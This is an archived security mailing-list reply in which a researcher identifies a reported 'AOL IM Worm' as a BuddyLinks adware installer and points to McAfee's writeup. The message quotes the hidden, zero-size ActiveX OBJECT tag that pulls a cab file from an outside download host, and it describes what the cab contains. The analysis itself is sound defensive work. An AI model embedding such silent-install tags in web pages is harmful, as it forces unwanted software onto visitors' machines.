lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000001c3f0dc$33963820$0202a8c0@teliahomebase>
From: kruse at krusesecurity.dk (Peter Kruse)
Subject: SV: AOL IM Worm

Hi,

It?s a Buddylist Adware. The page uses codebase object to run the
ActiveX component:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,
0,001">

The cab file contains the files Shellinstaller.ini (2.119 bytes) and the
binary ShellInstaller.ocx (81.920 bytes). The activex component hooks
itself to IE and works as a typical adware component. No virus code
here.

McAfee has posted a writeup at this URL:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007

Regards
Peter Kruse


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ